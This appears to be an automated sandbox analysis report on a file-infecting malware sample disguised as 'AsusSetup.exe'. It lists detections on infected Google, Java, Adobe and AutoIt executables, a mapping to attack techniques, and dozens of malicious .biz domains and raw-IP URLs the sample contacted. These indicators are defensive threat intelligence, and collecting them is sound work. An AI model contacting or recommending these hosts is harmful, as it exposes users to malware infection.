Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\AsusSetup.exe Code function: 0_2_00000001401CB8F4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 2 LSASS Driver | 1 Process Injection | 222 Masquerading | OS Credential Dumping | 1 System Time Discovery | 1 Taint Shared Content | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 11 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 2 LSASS Driver | 1 Process Injection | Security Account Manager | 11 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 12 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph (image not reproduced): ID: 1543957, Sample: AsusSetup.exe, Start date: 28/10/2024, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label | Link
AsusSetup.exe | 74% | ReversingLabs | Win64.Virus.Expiro
AsusSetup.exe | 100% | Avira | W32/Infector.Gen
AsusSetup.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                                                                                                                                        bzkysubds.biz
                                                                                                                                                        3.94.10.34
                                                                                                                                                        truefalse
                                                                                                                                                          unknown
                                                                                                                                                          xlfhhhm.biz
                                                                                                                                                          47.129.31.212
                                                                                                                                                          truefalse
                                                                                                                                                            unknown
                                                                                                                                                            warkcdu.biz
                                                                                                                                                            18.141.10.107
                                                                                                                                                            truefalse
                                                                                                                                                              unknown
                                                                                                                                                              npukfztj.biz
                                                                                                                                                              44.221.84.105
                                                                                                                                                              truetrue
                                                                                                                                                                unknown
                                                                                                                                                                dwrqljrr.biz
                                                                                                                                                                54.244.188.177
                                                                                                                                                                truefalse
                                                                                                                                                                  unknown
                                                                                                                                                                  gytujflc.biz
                                                                                                                                                                  208.100.26.245
                                                                                                                                                                  truefalse
                                                                                                                                                                    unknown
                                                                                                                                                                    gvijgjwkh.biz
                                                                                                                                                                    3.94.10.34
                                                                                                                                                                    truefalse
                                                                                                                                                                      unknown
                                                                                                                                                                      sewlqwcd.biz
                                                                                                                                                                      44.221.84.105
                                                                                                                                                                      truetrue
                                                                                                                                                                        unknown
                                                                                                                                                                        vnvbt.biz
                                                                                                                                                                        18.246.231.120
                                                                                                                                                                        truetrue
                                                                                                                                                                          unknown
                                                                                                                                                                          nwdnxrd.biz
                                                                                                                                                                          54.244.188.177
                                                                                                                                                                          truefalse
                                                                                                                                                                            unknown
                                                                                                                                                                            qvuhsaqa.biz
                                                                                                                                                                            54.244.188.177
                                                                                                                                                                            truefalse
                                                                                                                                                                              unknown
                                                                                                                                                                              iuzpxe.biz
                                                                                                                                                                              13.251.16.150
                                                                                                                                                                              truefalse
                                                                                                                                                                                unknown
                                                                                                                                                                                nqwjmb.biz
                                                                                                                                                                                35.164.78.200
                                                                                                                                                                                truefalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  wllvnzb.biz
                                                                                                                                                                                  18.141.10.107
                                                                                                                                                                                  truefalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    kvbjaur.biz
                                                                                                                                                                                    54.244.188.177
                                                                                                                                                                                    truefalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      napws.biz
                                                                                                                                                                                      35.164.78.200
                                                                                                                                                                                      truefalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        cvgrf.biz
                                                                                                                                                                                        54.244.188.177
                                                                                                                                                                                        truefalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          lpuegx.biz
                                                                                                                                                                                          82.112.184.197
                                                                                                                                                                                          truefalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            vcddkls.biz
                                                                                                                                                                                            18.141.10.107
                                                                                                                                                                                            truefalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              wluwplyh.biz
                                                                                                                                                                                              18.141.10.107
                                                                                                                                                                                              truefalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                vyome.biz
                                                                                                                                                                                                18.246.231.120
                                                                                                                                                                                                truetrue
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  dlynankz.biz
                                                                                                                                                                                                  85.214.228.140
                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    reczwga.biz
                                                                                                                                                                                                    44.221.84.105
                                                                                                                                                                                                    truetrue
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      xccjj.biz
                                                                                                                                                                                                      18.246.231.120
                                                                                                                                                                                                      truetrue
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        jifai.biz
                                                                                                                                                                                                        44.221.84.105
                                                                                                                                                                                                        truetrue
                                                                                                                                                                                                          unknown
Name | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                http://ijnmvqa.biz/vlwdbxkbnakykkgrfalse
                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                  http://vjaxhpbji.biz/bdrtsxyfalse
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    http://ftxlah.biz/xmqlmgbfalse
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      http://yunalwv.biz/dovasmbpdbfalse
                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                        http://jpskm.biz/qtybvvfgdyqyfalse
                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                          http://pgfsvwx.biz/vtxunogtrue
                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                            http://sxmiywsfv.biz/ohpfalse
                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                              http://fwiwk.biz/ckdrshkofalse
                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                http://damcprvgv.biz/dnmujjtrue
                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                  http://jdhhbs.biz/assjekulsfalse
                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                    http://cjvgcl.biz/cbrxaagotrue
                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                      http://esuzf.biz/rwiegxfalse
                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                        http://mnjmhp.biz/pcwhdleqsuufalse
                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                          http://dyjdrp.biz/mxtehtsjbwfalse
                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                            http://qcrsp.biz/wbxnurofalse
                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                              http://lpuegx.biz/dnirvyhujqwqncfalse
                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                http://uevrpr.biz/xtrue
                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                  http://xnxvnn.biz/skriadsmnmfalse
                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                    http://xccjj.biz/aixrttrue
                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                      http://zrlssa.biz/mcduyucxmuwkatrue
                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                        http://ecxbwt.biz/asvifalse
                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                          http://banwyw.biz/ydbxvrfdujattrue
                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                            http://przvgke.biz/agsaomftijmfalse
                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                              http://rffxu.biz/luseocfalse
                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                http://napws.biz/mcjaqbnefalse
                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                  http://qpnczch.biz/oomorpsdyukhtrue
                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                    http://nlscndwp.biz/nfalse
                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                      http://qaynky.biz/vvofalse
                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                        http://cvgrf.biz/nxfilvvdujkpfalse
                                                                                                                                                                                                                                                                                                                          unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                                                                                                                                                                                          http://47.129.31.212/lenalg.exe, 00000003.00000003.2610742112.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                                            http://18.141.10.107:80/ewfalg.exe, 00000003.00000003.2882783390.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                                              http://34.246.200.160:80/qearwetpmwvhvwhialg.exe, 00000003.00000003.2683846196.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                                http://18.141.10.107:80/suoyjqbsciv-alg.exe, 00000003.00000003.2247222362.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                                  http://13.251.16.150/ubadvhdsrbjcmaqlalg.exe, 00000003.00000003.2628578361.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                                    http://54.244.188.177/juldvutdralg.exe, 00000003.00000003.2179509377.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2179863337.0000000000599000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2179107038.000000000059C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                                                      http://44.221.84.105/vicdeigingsAsusSetup.exe, 00000000.00000003.2203124475.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2476390228.0000000004D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                                                        http://44.221.84.105:80/tj7fZalg.exe, 00000003.00000003.2864295525.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                                                          http://82.112.184.197/alg.exe, 00000003.00000003.2610742112.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2590844447.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2628578361.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                                                            http://18.208.156.248/lrealg.exe, 00000003.00000003.2850603674.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                                                              https://crashpad.chromium.org/bug/newsetup.exe1.3.drfalse
                                                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                                                http://208.100.26.245/pubppqcmfqvtoalg.exe, 00000003.00000003.2764371379.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2745295044.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2756590445.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2765126800.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2733658174.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2778124270.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2792457959.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2789296981.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2790012087.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                                                  http://44.221.84.105/bsalg.exe, 00000003.00000003.2864295525.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                                                    http://208.100.26.245:80/hrtvnxyfpkjy5alg.exe, 00000003.00000003.2704536498.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                                                                      http://44.221.84.105/ngsAsusSetup.exe, 00000000.00000003.2202574488.0000000000518000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2472059916.0000000000518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                                                                        http://18.208.156.248/gsalg.exe, 00000003.00000003.2903488909.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                                                                          http://18.141.10.107/ewfngsialg.exe, 00000003.00000003.2882783390.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                                                                            http://18.208.156.248:80/yqjotihouwfthlkralg.exe, 00000003.00000003.2903488909.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                                                                              http://172.234.222.138/sdalg.exe, 00000003.00000003.2671636939.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                                                                http://18.208.156.248/tlrealg.exe, 00000003.00000003.2850603674.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2850603674.0000000000596000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                                                                  http://208.100.26.245/(alg.exe, 00000003.00000003.2704536498.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                                                                    http://54.244.188.177/alg.exe, 00000003.00000003.2179509377.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                                                                                      http://54.244.188.177:80/swlsalg.exe, 00000003.00000003.2755453879.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2745895344.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                                                                                        http://44.221.84.105/vicdeigAsusSetup.exe, 00000000.00000003.2203124475.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.2202574488.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2476390228.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2472059916.00000000004F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                                                                                          http://54.244.188.177/eaAsusSetup.exe, 00000000.00000003.2170515807.000000000052B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                                                                                            http://208.100.26.245/hrtvnxyfpkjysalg.exe, 00000003.00000003.2764371379.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2745295044.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2703850793.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2756590445.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2765126800.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2733658174.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2778124270.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2789296981.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2724178578.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2790012087.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                                                                                              http://34.246.200.160/gsalg.exe, 00000003.00000003.2683846196.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                                                                                http://18.141.10.107/bsalg.exe, 00000003.00000003.2655317919.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1543957
Start date and time: 2024-10-28 16:48:55 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: AsusSetup.exe
Detection: MAL
Classification: mal100.spre.troj.expl.evad.winEXE@7/130@156/19
                                                                                                                                                                                                                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  HCA Information:Failed
                                                                                                                                                                                                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                                                                                                                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                  • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                  • VT rate limit hit for: AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
